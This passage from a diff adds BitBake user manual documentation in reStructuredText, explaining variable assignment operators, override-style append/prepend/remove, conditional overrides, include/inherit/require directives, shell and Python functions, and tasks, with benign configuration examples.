+   assignments to a single variable exist, the first of those ends up
+   getting used.
+
+Setting a weak default value (??=)
+----------------------------------
+
+It is possible to use a "weaker" assignment than in the previous section
+by using the "??=" operator. This assignment behaves identical to "?="
+except that the assignment is made at the end of the parsing process
+rather than immediately. Consequently, when multiple "??=" assignments
+exist, the last one is used. Also, any "=" or "?=" assignment will
+override the value set with "??=". Here is an example: ::
+
+   A ??= "somevalue"
+   A ??= "someothervalue"
+
+If ``A`` is set before the above statements are
+parsed, the variable retains its value. If ``A`` is not set, the
+variable is set to "someothervalue".
+
+Again, this assignment is a "lazy" or "weak" assignment because it does
+not occur until the end of the parsing process.
+
+Immediate variable expansion (:=)
+---------------------------------
+
+The ":=" operator results in a variable's contents being expanded
+immediately, rather than when the variable is actually used: ::
+
+   T = "123"
+   A := "test ${T}"
+   T = "456"
+   B := "${T} ${C}"
+   C = "cval"
+   C := "${C}append"
+
+In this example, ``A`` contains "test 123", even though the final value
+of ``T`` is "456". The variable ``B`` will end up containing "456
+cvalappend". This is because references to undefined variables are
+preserved as is during (immediate)expansion. This is in contrast to GNU
+Make, where undefined variables expand to nothing. The variable ``C``
+contains "cvalappend" since ``${C}`` immediately expands to "cval".
+
+.. _appending-and-prepending:
+
+Appending (+=) and prepending (=+) With Spaces
+----------------------------------------------
+
+Appending and prepending values is common and can be accomplished using
+the "+=" and "=+" operators. These operators insert a space between the
+current value and prepended or appended value.
+
+These operators take immediate effect during parsing. Here are some
+examples: ::
+
+   B = "bval"
+   B += "additionaldata"
+   C = "cval"
+   C =+ "test"
+
+The variable ``B`` contains "bval additionaldata" and ``C`` contains "test
+cval".
+
+.. _appending-and-prepending-without-spaces:
+
+Appending (.=) and Prepending (=.) Without Spaces
+-------------------------------------------------
+
+If you want to append or prepend values without an inserted space, use
+the ".=" and "=." operators.
+
+These operators take immediate effect during parsing. Here are some
+examples: ::
+
+   B = "bval"
+   B .= "additionaldata"
+   C = "cval"
+   C =. "test"
+
+The variable ``B`` contains "bvaladditionaldata" and ``C`` contains
+"testcval".
+
+Appending and Prepending (Override Style Syntax)
+------------------------------------------------
+
+You can also append and prepend a variable's value using an override
+style syntax. When you use this syntax, no spaces are inserted.
+
+These operators differ from the ":=", ".=", "=.", "+=", and "=+"
+operators in that their effects are applied at variable expansion time
+rather than being immediately applied. Here are some examples: ::
+
+   B = "bval"
+   B_append = " additional data"
+   C = "cval"
+   C_prepend = "additional data "
+   D = "dval"
+   D_append = "additional data"
+
+The variable ``B``
+becomes "bval additional data" and ``C`` becomes "additional data cval".
+The variable ``D`` becomes "dvaladditional data".
+
+.. note::
+
+   You must control all spacing when you use the override syntax.
+
+It is also possible to append and prepend to shell functions and
+BitBake-style Python functions. See the ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:shell functions`" and ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:bitbake-style python functions`"
+sections for examples.
+
+.. _removing-override-style-syntax:
+
+Removal (Override Style Syntax)
+-------------------------------
+
+You can remove values from lists using the removal override style
+syntax. Specifying a value for removal causes all occurrences of that
+value to be removed from the variable.
+
+When you use this syntax, BitBake expects one or more strings.
+Surrounding spaces and spacing are preserved. Here is an example: ::
+
+   FOO = "123 456 789 123456 123 456 123 456"
+   FOO_remove = "123"
+   FOO_remove = "456"
+   FOO2 = " abc def ghi abcdef abc def abc def def"
+   FOO2_remove = "\
+       def \
+       abc \
+       ghi \
+       "
+
+The variable ``FOO`` becomes
+"  789 123456    " and ``FOO2`` becomes "    abcdef     ".
+
+Like "_append" and "_prepend", "_remove" is applied at variable
+expansion time.
+
+Override Style Operation Advantages
+-----------------------------------
+
+An advantage of the override style operations "_append", "_prepend", and
+"_remove" as compared to the "+=" and "=+" operators is that the
+override style operators provide guaranteed operations. For example,
+consider a class ``foo.bbclass`` that needs to add the value "val" to
+the variable ``FOO``, and a recipe that uses ``foo.bbclass`` as follows: ::
+
+   inherit foo
+   FOO = "initial"
+
+If ``foo.bbclass`` uses the "+=" operator,
+as follows, then the final value of ``FOO`` will be "initial", which is
+not what is desired: ::
+
+   FOO += "val"
+
+If, on the other hand, ``foo.bbclass``
+uses the "_append" operator, then the final value of ``FOO`` will be
+"initial val", as intended: ::
+
+   FOO_append = " val"
+
+.. note::
+
+   It is never necessary to use "+=" together with "_append". The following
+   sequence of assignments appends "barbaz" to FOO: ::
+
+       FOO_append = "bar"
+       FOO_append = "baz"
+
+
+   The only effect of changing the second assignment in the previous
+   example to use "+=" would be to add a space before "baz" in the
+   appended value (due to how the "+=" operator works).
+
+Another advantage of the override style operations is that you can
+combine them with other overrides as described in the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:conditional syntax (overrides)`" section.
+
+Variable Flag Syntax
+--------------------
+
+Variable flags are BitBake's implementation of variable properties or
+attributes. It is a way of tagging extra information onto a variable.
+You can find more out about variable flags in general in the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variable flags`" section.
+
+You can define, append, and prepend values to variable flags. All the
+standard syntax operations previously mentioned work for variable flags
+except for override style syntax (i.e. "_prepend", "_append", and
+"_remove").
+
+Here are some examples showing how to set variable flags: ::
+
+   FOO[a] = "abc"
+   FOO[b] = "123"
+   FOO[a] += "456"
+
+The variable ``FOO`` has two flags:
+``[a]`` and ``[b]``. The flags are immediately set to "abc" and "123",
+respectively. The ``[a]`` flag becomes "abc 456".
+
+No need exists to pre-define variable flags. You can simply start using
+them. One extremely common application is to attach some brief
+documentation to a BitBake variable as follows: ::
+
+   CACHE[doc] = "The directory holding the cache of the metadata."
+
+Inline Python Variable Expansion
+--------------------------------
+
+You can use inline Python variable expansion to set variables. Here is
+an example: ::
+
+   DATE = "${@time.strftime('%Y%m%d',time.gmtime())}"
+
+This example results in the ``DATE`` variable being set to the current date.
+
+Probably the most common use of this feature is to extract the value of
+variables from BitBake's internal data dictionary, ``d``. The following
+lines select the values of a package name and its version number,
+respectively: ::
+
+   PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
+   PV = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[1] or '1.0'}"
+
+.. note::
+
+   Inline Python expressions work just like variable expansions insofar as the
+   "=" and ":=" operators are concerned. Given the following assignment, foo()
+   is called each time FOO is expanded: ::
+
+      FOO = "${@foo()}"
+
+   Contrast this with the following immediate assignment, where foo() is only
+   called once, while the assignment is parsed: ::
+
+      FOO := "${@foo()}"
+
+For a different way to set variables with Python code during parsing,
+see the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:anonymous python functions`" section.
+
+Unsetting variables
+-------------------
+
+It is possible to completely remove a variable or a variable flag from
+BitBake's internal data dictionary by using the "unset" keyword. Here is
+an example: ::
+
+   unset DATE
+   unset do_fetch[noexec]
+
+These two statements remove the ``DATE`` and the ``do_fetch[noexec]`` flag.
+
+Providing Pathnames
+-------------------
+
+When specifying pathnames for use with BitBake, do not use the tilde
+("~") character as a shortcut for your home directory. Doing so might
+cause BitBake to not recognize the path since BitBake does not expand
+this character in the same way a shell would.
+
+Instead, provide a fuller path as the following example illustrates: ::
+
+   BBLAYERS ?= " \
+       /home/scott-lenovo/LayerA \
+   "
+
+Exporting Variables to the Environment
+======================================
+
+You can export variables to the environment of running tasks by using
+the ``export`` keyword. For example, in the following example, the
+``do_foo`` task prints "value from the environment" when run: ::
+
+   export ENV_VARIABLE
+   ENV_VARIABLE = "value from the environment"
+
+   do_foo() {
+       bbplain "$ENV_VARIABLE"
+   }
+
+.. note::
+
+   BitBake does not expand ``$ENV_VARIABLE`` in this case because it lacks the
+   obligatory ``{}`` . Rather, ``$ENV_VARIABLE`` is expanded by the shell.
+
+It does not matter whether ``export ENV_VARIABLE`` appears before or
+after assignments to ``ENV_VARIABLE``.
+
+It is also possible to combine ``export`` with setting a value for the
+variable. Here is an example: ::
+
+   export ENV_VARIABLE = "variable-value"
+
+In the output of ``bitbake -e``, variables that are exported to the
+environment are preceded by "export".
+
+Among the variables commonly exported to the environment are ``CC`` and
+``CFLAGS``, which are picked up by many build systems.
+
+Conditional Syntax (Overrides)
+==============================
+
+BitBake uses :term:`OVERRIDES` to control what
+variables are overridden after BitBake parses recipes and configuration
+files. This section describes how you can use ``OVERRIDES`` as
+conditional metadata, talks about key expansion in relationship to
+``OVERRIDES``, and provides some examples to help with understanding.
+
+Conditional Metadata
+--------------------
+
+You can use ``OVERRIDES`` to conditionally select a specific version of
+a variable and to conditionally append or prepend the value of a
+variable.
+
+.. note::
+
+   Overrides can only use lower-case characters. Additionally,
+   underscores are not permitted in override names as they are used to
+   separate overrides from each other and from the variable name.
+
+-  *Selecting a Variable:* The ``OVERRIDES`` variable is a
+   colon-character-separated list that contains items for which you want
+   to satisfy conditions. Thus, if you have a variable that is
+   conditional on "arm", and "arm" is in ``OVERRIDES``, then the
+   "arm"-specific version of the variable is used rather than the
+   non-conditional version. Here is an example: ::
+
+      OVERRIDES = "architecture:os:machine"
+      TEST = "default"
+      TEST_os = "osspecific"
+      TEST_nooverride = "othercondvalue"
+
+   In this example, the ``OVERRIDES``
+   variable lists three overrides: "architecture", "os", and "machine".
+   The variable ``TEST`` by itself has a default value of "default". You
+   select the os-specific version of the ``TEST`` variable by appending
+   the "os" override to the variable (i.e. ``TEST_os``).
+
+   To better understand this, consider a practical example that assumes
+   an OpenEmbedded metadata-based Linux kernel recipe file. The
+   following lines from the recipe file first set the kernel branch
+   variable ``KBRANCH`` to a default value, then conditionally override
+   that value based on the architecture of the build: ::
+
+      KBRANCH = "standard/base"
+      KBRANCH_qemuarm = "standard/arm-versatile-926ejs"
+      KBRANCH_qemumips = "standard/mti-malta32"
+      KBRANCH_qemuppc = "standard/qemuppc"
+      KBRANCH_qemux86 = "standard/common-pc/base"
+      KBRANCH_qemux86-64 = "standard/common-pc-64/base"
+      KBRANCH_qemumips64 = "standard/mti-malta64"
+
+-  *Appending and Prepending:* BitBake also supports append and prepend
+   operations to variable values based on whether a specific item is
+   listed in ``OVERRIDES``. Here is an example: ::
+
+      DEPENDS = "glibc ncurses"
+      OVERRIDES = "machine:local"
+      DEPENDS_append_machine = "libmad"
+
+   In this example, ``DEPENDS`` becomes "glibc ncurses libmad".
+
+   Again, using an OpenEmbedded metadata-based kernel recipe file as an
+   example, the following lines will conditionally append to the
+   ``KERNEL_FEATURES`` variable based on the architecture: ::
+
+      KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
+      KERNEL_FEATURES_append_qemux86=" cfg/sound.scc cfg/paravirt_kvm.scc"
+      KERNEL_FEATURES_append_qemux86-64=" cfg/sound.scc cfg/paravirt_kvm.scc"
+
+-  *Setting a Variable for a Single Task:* BitBake supports setting a
+   variable just for the duration of a single task. Here is an example: ::
+
+      FOO_task-configure = "val 1"
+      FOO_task-compile = "val 2"
+
+   In the
+   previous example, ``FOO`` has the value "val 1" while the
+   ``do_configure`` task is executed, and the value "val 2" while the
+   ``do_compile`` task is executed.
+
+   Internally, this is implemented by prepending the task (e.g.
+   "task-compile:") to the value of
+   :term:`OVERRIDES` for the local datastore of the
+   ``do_compile`` task.
+
+   You can also use this syntax with other combinations (e.g.
+   "``_prepend``") as shown in the following example: ::
+
+      EXTRA_OEMAKE_prepend_task-compile = "${PARALLEL_MAKE} "
+
+Key Expansion
+-------------
+
+Key expansion happens when the BitBake datastore is finalized. To better
+understand this, consider the following example: ::
+
+   A${B} = "X"
+   B = "2"
+   A2 = "Y"
+
+In this case, after all the parsing is complete, BitBake expands
+``${B}`` into "2". This expansion causes ``A2``, which was set to "Y"
+before the expansion, to become "X".
+
+.. _variable-interaction-worked-examples:
+
+Examples
+--------
+
+Despite the previous explanations that show the different forms of
+variable definitions, it can be hard to work out exactly what happens
+when variable operators, conditional overrides, and unconditional
+overrides are combined. This section presents some common scenarios
+along with explanations for variable interactions that typically confuse
+users.
+
+There is often confusion concerning the order in which overrides and
+various "append" operators take effect. Recall that an append or prepend
+operation using "_append" and "_prepend" does not result in an immediate
+assignment as would "+=", ".=", "=+", or "=.". Consider the following
+example: ::
+
+   OVERRIDES = "foo"
+   A = "Z"
+   A_foo_append = "X"
+
+For this case,
+``A`` is unconditionally set to "Z" and "X" is unconditionally and
+immediately appended to the variable ``A_foo``. Because overrides have
+not been applied yet, ``A_foo`` is set to "X" due to the append and
+``A`` simply equals "Z".
+
+Applying overrides, however, changes things. Since "foo" is listed in
+``OVERRIDES``, the conditional variable ``A`` is replaced with the "foo"
+version, which is equal to "X". So effectively, ``A_foo`` replaces
+``A``.
+
+This next example changes the order of the override and the append: ::
+
+   OVERRIDES = "foo"
+   A = "Z"
+   A_append_foo = "X"
+
+For this case, before
+overrides are handled, ``A`` is set to "Z" and ``A_append_foo`` is set
+to "X". Once the override for "foo" is applied, however, ``A`` gets
+appended with "X". Consequently, ``A`` becomes "ZX". Notice that spaces
+are not appended.
+
+This next example has the order of the appends and overrides reversed
+back as in the first example: ::
+
+   OVERRIDES = "foo"
+   A = "Y"
+   A_foo_append = "Z"
+   A_foo_append = "X"
+
+For this case, before any overrides are resolved,
+``A`` is set to "Y" using an immediate assignment. After this immediate
+assignment, ``A_foo`` is set to "Z", and then further appended with "X"
+leaving the variable set to "ZX". Finally, applying the override for
+"foo" results in the conditional variable ``A`` becoming "ZX" (i.e.
+``A`` is replaced with ``A_foo``).
+
+This final example mixes in some varying operators: ::
+
+   A = "1"
+   A_append = "2"
+   A_append = "3"
+   A += "4"
+   A .= "5"
+
+For this case, the type of append
+operators are affecting the order of assignments as BitBake passes
+through the code multiple times. Initially, ``A`` is set to "1 45"
+because of the three statements that use immediate operators. After
+these assignments are made, BitBake applies the "_append" operations.
+Those operations result in ``A`` becoming "1 4523".
+
+Sharing Functionality
+=====================
+
+BitBake allows for metadata sharing through include files (``.inc``) and
+class files (``.bbclass``). For example, suppose you have a piece of
+common functionality such as a task definition that you want to share
+between more than one recipe. In this case, creating a ``.bbclass`` file
+that contains the common functionality and then using the ``inherit``
+directive in your recipes to inherit the class would be a common way to
+share the task.
+
+This section presents the mechanisms BitBake provides to allow you to
+share functionality between recipes. Specifically, the mechanisms
+include ``include``, ``inherit``, ``INHERIT``, and ``require``
+directives.
+
+Locating Include and Class Files
+--------------------------------
+
+BitBake uses the :term:`BBPATH` variable to locate
+needed include and class files. Additionally, BitBake searches the
+current directory for ``include`` and ``require`` directives.
+
+.. note::
+
+   The BBPATH variable is analogous to the environment variable PATH .
+
+In order for include and class files to be found by BitBake, they need
+to be located in a "classes" subdirectory that can be found in
+``BBPATH``.
+
+``inherit`` Directive
+---------------------
+
+When writing a recipe or class file, you can use the ``inherit``
+directive to inherit the functionality of a class (``.bbclass``).
+BitBake only supports this directive when used within recipe and class
+files (i.e. ``.bb`` and ``.bbclass``).
+
+The ``inherit`` directive is a rudimentary means of specifying
+functionality contained in class files that your recipes require. For
+example, you can easily abstract out the tasks involved in building a
+package that uses Autoconf and Automake and put those tasks into a class
+file and then have your recipe inherit that class file.
+
+As an example, your recipes could use the following directive to inherit
+an ``autotools.bbclass`` file. The class file would contain common
+functionality for using Autotools that could be shared across recipes: ::
+
+   inherit autotools
+
+In this case, BitBake would search for the directory
+``classes/autotools.bbclass`` in ``BBPATH``.
+
+.. note::
+
+   You can override any values and functions of the inherited class
+   within your recipe by doing so after the "inherit" statement.
+
+If you want to use the directive to inherit multiple classes, separate
+them with spaces. The following example shows how to inherit both the
+``buildhistory`` and ``rm_work`` classes: ::
+
+   inherit buildhistory rm_work
+
+An advantage with the inherit directive as compared to both the
+:ref:`include <bitbake-user-manual/bitbake-user-manual-metadata:\`\`include\`\` directive>` and :ref:`require <bitbake-user-manual/bitbake-user-manual-metadata:\`\`require\`\` directive>`
+directives is that you can inherit class files conditionally. You can
+accomplish this by using a variable expression after the ``inherit``
+statement. Here is an example: ::
+
+   inherit ${VARNAME}
+
+If ``VARNAME`` is
+going to be set, it needs to be set before the ``inherit`` statement is
+parsed. One way to achieve a conditional inherit in this case is to use
+overrides: ::
+
+   VARIABLE = ""
+   VARIABLE_someoverride = "myclass"
+
+Another method is by using anonymous Python. Here is an example: ::
+
+   python () {
+       if condition == value:
+           d.setVar('VARIABLE', 'myclass')
+       else:
+           d.setVar('VARIABLE', '')
+   }
+
+Alternatively, you could use an in-line Python expression in the
+following form: ::
+
+   inherit ${@'classname' if condition else ''}
+   inherit ${@functionname(params)}
+
+In all cases, if the expression evaluates to an
+empty string, the statement does not trigger a syntax error because it
+becomes a no-op.
+
+``include`` Directive
+---------------------
+
+BitBake understands the ``include`` directive. This directive causes
+BitBake to parse whatever file you specify, and to insert that file at
+that location. The directive is much like its equivalent in Make except
+that if the path specified on the include line is a relative path,
+BitBake locates the first file it can find within ``BBPATH``.
+
+The include directive is a more generic method of including
+functionality as compared to the :ref:`inherit <bitbake-user-manual/bitbake-user-manual-metadata:\`\`inherit\`\` directive>`
+directive, which is restricted to class (i.e. ``.bbclass``) files. The
+include directive is applicable for any other kind of shared or
+encapsulated functionality or configuration that does not suit a
+``.bbclass`` file.
+
+As an example, suppose you needed a recipe to include some self-test
+definitions: ::
+
+   include test_defs.inc
+
+.. note::
+
+   The include directive does not produce an error when the file cannot be
+   found.  Consequently, it is recommended that if the file you are including is
+   expected to exist, you should use :ref:`require <require-inclusion>` instead
+   of include . Doing so makes sure that an error is produced if the file cannot
+   be found.
+
+.. _require-inclusion:
+
+``require`` Directive
+---------------------
+
+BitBake understands the ``require`` directive. This directive behaves
+just like the ``include`` directive with the exception that BitBake
+raises a parsing error if the file to be included cannot be found. Thus,
+any file you require is inserted into the file that is being parsed at
+the location of the directive.
+
+The require directive, like the include directive previously described,
+is a more generic method of including functionality as compared to the
+:ref:`inherit <bitbake-user-manual/bitbake-user-manual-metadata:\`\`inherit\`\` directive>` directive, which is restricted to class
+(i.e. ``.bbclass``) files. The require directive is applicable for any
+other kind of shared or encapsulated functionality or configuration that
+does not suit a ``.bbclass`` file.
+
+Similar to how BitBake handles :ref:`include <bitbake-user-manual/bitbake-user-manual-metadata:\`\`include\`\` directive>`, if
+the path specified on the require line is a relative path, BitBake
+locates the first file it can find within ``BBPATH``.
+
+As an example, suppose you have two versions of a recipe (e.g.
+``foo_1.2.2.bb`` and ``foo_2.0.0.bb``) where each version contains some
+identical functionality that could be shared. You could create an
+include file named ``foo.inc`` that contains the common definitions
+needed to build "foo". You need to be sure ``foo.inc`` is located in the
+same directory as your two recipe files as well. Once these conditions
+are set up, you can share the functionality using a ``require``
+directive from within each recipe: ::
+
+   require foo.inc
+
+``INHERIT`` Configuration Directive
+-----------------------------------
+
+When creating a configuration file (``.conf``), you can use the
+:term:`INHERIT` configuration directive to inherit a
+class. BitBake only supports this directive when used within a
+configuration file.
+
+As an example, suppose you needed to inherit a class file called
+``abc.bbclass`` from a configuration file as follows: ::
+
+   INHERIT += "abc"
+
+This configuration directive causes the named class to be inherited at
+the point of the directive during parsing. As with the ``inherit``
+directive, the ``.bbclass`` file must be located in a "classes"
+subdirectory in one of the directories specified in ``BBPATH``.
+
+.. note::
+
+   Because .conf files are parsed first during BitBake's execution, using
+   INHERIT to inherit a class effectively inherits the class globally (i.e. for
+   all recipes).
+
+If you want to use the directive to inherit multiple classes, you can
+provide them on the same line in the ``local.conf`` file. Use spaces to
+separate the classes. The following example shows how to inherit both
+the ``autotools`` and ``pkgconfig`` classes: ::
+
+   INHERIT += "autotools pkgconfig"
+
+Functions
+=========
+
+As with most languages, functions are the building blocks that are used
+to build up operations into tasks. BitBake supports these types of
+functions:
+
+-  *Shell Functions:* Functions written in shell script and executed
+   either directly as functions, tasks, or both. They can also be called
+   by other shell functions.
+
+-  *BitBake-Style Python Functions:* Functions written in Python and
+   executed by BitBake or other Python functions using
+   ``bb.build.exec_func()``.
+
+-  *Python Functions:* Functions written in Python and executed by
+   Python.
+
+-  *Anonymous Python Functions:* Python functions executed automatically
+   during parsing.
+
+Regardless of the type of function, you can only define them in class
+(``.bbclass``) and recipe (``.bb`` or ``.inc``) files.
+
+Shell Functions
+---------------
+
+Functions written in shell script and executed either directly as
+functions, tasks, or both. They can also be called by other shell
+functions. Here is an example shell function definition: ::
+
+   some_function () {
+       echo "Hello World"
+   }
+
+When you create these types of functions in
+your recipe or class files, you need to follow the shell programming
+rules. The scripts are executed by ``/bin/sh``, which may not be a bash
+shell but might be something such as ``dash``. You should not use
+Bash-specific script (bashisms).
+
+Overrides and override-style operators like ``_append`` and ``_prepend``
+can also be applied to shell functions. Most commonly, this application
+would be used in a ``.bbappend`` file to modify functions in the main
+recipe. It can also be used to modify functions inherited from classes.
+
+As an example, consider the following: ::
+
+   do_foo() {
+       bbplain first
+       fn
+   }
+
+   fn_prepend() {
+       bbplain second
+   }
+
+   fn() {
+       bbplain third
+   }
+
+   do_foo_append() {
+       bbplain fourth
+   }
+
+Running ``do_foo`` prints the following: ::
+
+   recipename do_foo: first
+   recipename do_foo: second
+   recipename do_foo: third
+   recipename do_foo: fourth
+
+.. note::
+
+   Overrides and override-style operators can be applied to any shell
+   function, not just :ref:`tasks <bitbake-user-manual/bitbake-user-manual-metadata:tasks>`.
+
+You can use the ``bitbake -e`` recipename command to view the final
+assembled function after all overrides have been applied.
+
+BitBake-Style Python Functions
+------------------------------
+
+These functions are written in Python and executed by BitBake or other
+Python functions using ``bb.build.exec_func()``.
+
+An example BitBake function is: ::
+
+   python some_python_function () {
+       d.setVar("TEXT", "Hello World")
+       print d.getVar("TEXT")
+   }
+
+Because the
+Python "bb" and "os" modules are already imported, you do not need to
+import these modules. Also in these types of functions, the datastore
+("d") is a global variable and is always automatically available.
+
+.. note::
+
+   Variable expressions (e.g.  ``${X}`` ) are no longer expanded within Python
+   functions. This behavior is intentional in order to allow you to freely set
+   variable values to expandable expressions without having them expanded
+   prematurely. If you do wish to expand a variable within a Python function,
+   use ``d.getVar("X")`` . Or, for more complicated expressions, use ``d.expand()``.
+
+Similar to shell functions, you can also apply overrides and
+override-style operators to BitBake-style Python functions.
+
+As an example, consider the following: ::
+
+   python do_foo_prepend() {
+       bb.plain("first")
+   }
+
+   python do_foo() {
+       bb.plain("second")
+   }
+
+   python do_foo_append() {
+       bb.plain("third")
+   }
+
+Running ``do_foo`` prints the following: ::
+
+   recipename do_foo: first
+   recipename do_foo: second
+   recipename do_foo: third
+
+You can use the ``bitbake -e`` recipename command to view
+the final assembled function after all overrides have been applied.
+
+Python Functions
+----------------
+
+These functions are written in Python and are executed by other Python
+code. Examples of Python functions are utility functions that you intend
+to call from in-line Python or from within other Python functions. Here
+is an example: ::
+
+   def get_depends(d):
+       if d.getVar('SOMECONDITION'):
+           return "dependencywithcond"
+       else:
+           return "dependency"
+
+   SOMECONDITION = "1"
+   DEPENDS = "${@get_depends(d)}"
+
+This would result in ``DEPENDS`` containing ``dependencywithcond``.
+
+Here are some things to know about Python functions:
+
+-  Python functions can take parameters.
+
+-  The BitBake datastore is not automatically available. Consequently,
+   you must pass it in as a parameter to the function.
+
+-  The "bb" and "os" Python modules are automatically available. You do
+   not need to import them.
+
+BitBake-Style Python Functions Versus Python Functions
+------------------------------------------------------
+
+Following are some important differences between BitBake-style Python
+functions and regular Python functions defined with "def":
+
+-  Only BitBake-style Python functions can be :ref:`tasks <bitbake-user-manual/bitbake-user-manual-metadata:tasks>`.
+
+-  Overrides and override-style operators can only be applied to
+   BitBake-style Python functions.
+
+-  Only regular Python functions can take arguments and return values.
+
+-  :ref:`Variable flags <bitbake-user-manual/bitbake-user-manual-metadata:variable flags>` such as
+   ``[dirs]``, ``[cleandirs]``, and ``[lockfiles]`` can be used on BitBake-style
+   Python functions, but not on regular Python functions.
+
+-  BitBake-style Python functions generate a separate
+   ``${``\ :term:`T`\ ``}/run.``\ function-name\ ``.``\ pid
+   script that is executed to run the function, and also generate a log
+   file in ``${T}/log.``\ function-name\ ``.``\ pid if they are executed
+   as tasks.
+
+   Regular Python functions execute "inline" and do not generate any
+   files in ``${T}``.
+
+-  Regular Python functions are called with the usual Python syntax.
+   BitBake-style Python functions are usually tasks and are called
+   directly by BitBake, but can also be called manually from Python code
+   by using the ``bb.build.exec_func()`` function. Here is an example: ::
+
+      bb.build.exec_func("my_bitbake_style_function", d)
+
+   .. note::
+
+      ``bb.build.exec_func()`` can also be used to run shell functions from Python
+      code. If you want to run a shell function before a Python function within
+      the same task, then you can use a parent helper Python function that
+      starts by running the shell function with ``bb.build.exec_func()`` and then
+      runs the Python code.
+
+   To detect errors from functions executed with
+   ``bb.build.exec_func()``, you can catch the ``bb.build.FuncFailed``
+   exception.
+
+   .. note::
+
+      Functions in metadata (recipes and classes) should not themselves raise
+      ``bb.build.FuncFailed``. Rather, ``bb.build.FuncFailed`` should be viewed as a
+      general indicator that the called function failed by raising an
+      exception. For example, an exception raised by ``bb.fatal()`` will be caught
+      inside ``bb.build.exec_func()``, and a ``bb.build.FuncFailed`` will be raised in
+      response.
+
+Due to their simplicity, you should prefer regular Python functions over
+BitBake-style Python functions unless you need a feature specific to
+BitBake-style Python functions. Regular Python functions in metadata are
+a more recent invention than BitBake-style Python functions, and older
+code tends to use ``bb.build.exec_func()`` more often.
+
+Anonymous Python Functions
+--------------------------
+
+Sometimes it is useful to set variables or perform other operations
+programmatically during parsing. To do this, you can define special
+Python functions, called anonymous Python functions, that run at the end
+of parsing. For example, the following conditionally sets a variable
+based on the value of another variable: ::
+
+   python () {
+       if d.getVar('SOMEVAR') == 'value':
+           d.setVar('ANOTHERVAR', 'value2')
+   }
+
+An equivalent way to mark a function as an anonymous function is to give it
+the name "__anonymous", rather than no name.
+
+Anonymous Python functions always run at the end of parsing, regardless
+of where they are defined. If a recipe contains many anonymous
+functions, they run in the same order as they are defined within the
+recipe. As an example, consider the following snippet: ::
+
+   python () {
+       d.setVar('FOO', 'foo 2')
+   }
+
+   FOO = "foo 1"
+
+   python () {
+       d.appendVar('BAR',' bar 2')
+   }
+
+   BAR = "bar 1"
+
+The previous example is conceptually
+equivalent to the following snippet: ::
+
+   FOO = "foo 1"
+   BAR = "bar 1"
+   FOO = "foo 2"
+   BAR += "bar 2"
+
+``FOO`` ends up with the value "foo 2", and
+``BAR`` with the value "bar 1 bar 2". Just as in the second snippet, the
+values set for the variables within the anonymous functions become
+available to tasks, which always run after parsing.
+
+Overrides and override-style operators such as "``_append``" are applied
+before anonymous functions run. In the following example, ``FOO`` ends
+up with the value "foo from anonymous": ::
+
+   FOO = "foo"
+   FOO_append = " from outside"
+
+   python () {
+       d.setVar("FOO", "foo from anonymous")
+   }
+
+For methods
+you can use with anonymous Python functions, see the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:functions you can call from within python`"
+section. For a different method to run Python code during parsing, see
+the ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:inline python variable expansion`" section.
+
+Flexible Inheritance for Class Functions
+----------------------------------------
+
+Through coding techniques and the use of ``EXPORT_FUNCTIONS``, BitBake
+supports exporting a function from a class such that the class function
+appears as the default implementation of the function, but can still be
+called if a recipe inheriting the class needs to define its own version
+of the function.
+
+To understand the benefits of this feature, consider the basic scenario
+where a class defines a task function and your recipe inherits the
+class. In this basic scenario, your recipe inherits the task function as
+defined in the class. If desired, your recipe can add to the start and
+end of the function by using the "_prepend" or "_append" operations
+respectively, or it can redefine the function completely. However, if it
+redefines the function, there is no means for it to call the class
+version of the function. ``EXPORT_FUNCTIONS`` provides a mechanism that
+enables the recipe's version of the function to call the original
+version of the function.
+
+To make use of this technique, you need the following things in place:
+
+-  The class needs to define the function as follows: ::
+
+      classname_functionname
+
+   For example, if you have a class file
+   ``bar.bbclass`` and a function named ``do_foo``, the class must
+   define the function as follows: ::
+
+      bar_do_foo
+
+-  The class needs to contain the ``EXPORT_FUNCTIONS`` statement as
+   follows: ::
+
+      EXPORT_FUNCTIONS functionname
+
+   For example, continuing with
+   the same example, the statement in the ``bar.bbclass`` would be as
+   follows: ::
+
+      EXPORT_FUNCTIONS do_foo
+
+-  You need to call the function appropriately from within your recipe.
+   Continuing with the same example, if your recipe needs to call the
+   class version of the function, it should call ``bar_do_foo``.
+   Assuming ``do_foo`` was a shell function and ``EXPORT_FUNCTIONS`` was
+   used as above, the recipe's function could conditionally call the
+   class version of the function as follows: ::
+
+      do_foo() {
+          if [ somecondition ] ; then
+              bar_do_foo
+          else
+              # Do something else
+          fi
+      }
+
+   To call your modified version of the function as defined in your recipe,
+   call it as ``do_foo``.
+
+With these conditions met, your single recipe can freely choose between
+the original function as defined in the class file and the modified
+function in your recipe. If you do not set up these conditions, you are
+limited to using one function or the other.
+
+Tasks
+=====
+
+Tasks are BitBake execution units that make up the steps that BitBake
+can run for a given recipe. Tasks are only supported in recipes and
+classes (i.e. in ``.bb`` files and files included or inherited from
+``.bb`` files). By convention, tasks have names that start with "do\_".
+
+Promoting a Function to a Task
+------------------------------
+
+Tasks are either :ref:`shell functions <bitbake-user-manual/bitbake-user-manual-metadata:shell functions>` or
+:ref:`BitBake-style Python functions <bitbake-user-manual/bitbake-user-manual-metadata:bitbake-style python functions>`
+that have been promoted to tasks by using the ``addtask`` command. The
+``addtask`` command can also optionally describe dependencies between
+the task and other tasks. Here is an example that shows how to define a
+task and declare some dependencies: ::
+
+   python do_printdate () {
+       import time
+       print time.strftime('%Y%m%d', time.gmtime())
+   }
+   addtask printdate after do_fetch before do_build
+
+The first argument to ``addtask`` is the name
+of the function to promote to a task. If the name does not start with
+"do\_", "do\_" is implicitly added, which enforces the convention that all
+task names start with "do\_".
+
+In the previous example, the ``do_printdate`` task becomes a dependency
+of the ``do_build`` task, which is the default task (i.e. the task run
+by the ``bitbake`` command unless another task is specified explicitly).
+Additionally, the ``do_printdate`` task becomes dependent upon the
+``do_fetch`` task. Running the ``do_build`` task results in the
+``do_printdate`` task running first.
+
+.. note::
